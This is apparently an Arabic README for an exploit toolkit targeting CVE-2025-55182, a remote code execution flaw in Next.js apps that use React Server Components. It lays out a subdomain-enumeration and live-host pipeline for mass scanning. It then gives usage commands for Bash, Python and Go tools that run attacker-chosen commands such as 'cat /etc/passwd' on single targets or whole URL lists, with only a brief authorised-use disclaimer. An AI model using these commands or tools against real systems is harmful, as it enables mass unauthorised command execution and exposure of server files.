
ماسح ضوئي متعدد اللغات لثغرة CVE-2025-55182 (RCE) في مكونات خادم React Next.js، مع أوضاع المسح الفردي/الجماعي وسير عمل استطلاع مكافآت الاختراق المدمج.
مجموعة أدوات شاملة لاكتشاف واستغلال CVE-2025-55182، وهي ثغرة حرجة لتنفيذ الأوامر عن بُعد في تطبيقات Next.js التي تستخدم مكونات React Server.
يحتوي هذا المستودع على ماسح Bash موحد (وضع فردي ووضع جماعي)، وتنفيذات بلغة Python/Go، وسير عمل استطلاع لمكافآت الأخطاء.

للبحث الجماعي في النطاقات البدل، استخدم هذا الأنبوب لتصفية الأهداف قبل المسح:
# 1. Enumerate subdomains
subfinder -dL wildcards.txt -all -recursive > subs.txt
# 2. Filter for live hosts
httpx -l subs.txt -o live.txt
# 3. Pre-scan detection using Nuclei (optional)
nuclei -l live.txt -t CVE-2025-55182.yaml -o final.txt
يدعم سكريبت scanner.sh فحص هدف واحد وفحص جماعي من قائمة ملفات.
chmod +x scanner.sh
الأفضل للتحقق من هدف معين مع إخراج مفصل.
# Basic check (defaults to "id")
./scanner.sh -d example.com
# Execute custom command
./scanner.sh -d https://target.com -c "cat /etc/passwd"
يقوم بفحص قائمة عناوين URL بكفاءة وحفظ المضيفين المعرضين للخطر في ملف.
# Scan a list of URLs
./scanner.sh -l live.txt -c "whoami"
# Custom output file
./scanner.sh -l live.txt -o my_bounty.txt
استخدم هذا إذا واجهت مشاكل مع تخطي Bash للأحرف الخاصة.
pip install requests
python3 python/exploit.py -u http://target.com -c "uname -a"
أداء عالي، تبعيات ضئيلة.
go run go/main.go -u http://target.com -c "id"
cd go
go build -o cve-scanner main.go
./cve-scanner -u http://target.com
هذه الأداة لأغراض تعليمية واختبارات أمنية مصرح بها فقط. الاستخدام غير المصرح به غير قانوني تمامًا. لا يتحمل المطور أي مسؤولية عن سوء الاستخدام أو الأضرار الناجمة عن هذا البرنامج.
تفاصيل CVE من NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-55182
نشرة أمان React (ثغرة مكونات React Server): https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
قالب ProjectDiscovery Nuclei: https://cloud.projectdiscovery.io/library/CVE-2025-55182
| Flag | Description |
|---|
-d, --domain | عنوان URL هدف واحد |
-l, --list | ملف يحتوي على قائمة عناوين URL |
-c, --command | الأمر المراد تنفيذه (الافتراضي: id) |
-o, --output | ملف الإخراج للمضيفين المعرضين للخطر (الافتراضي: vulnerable_hosts.txt) |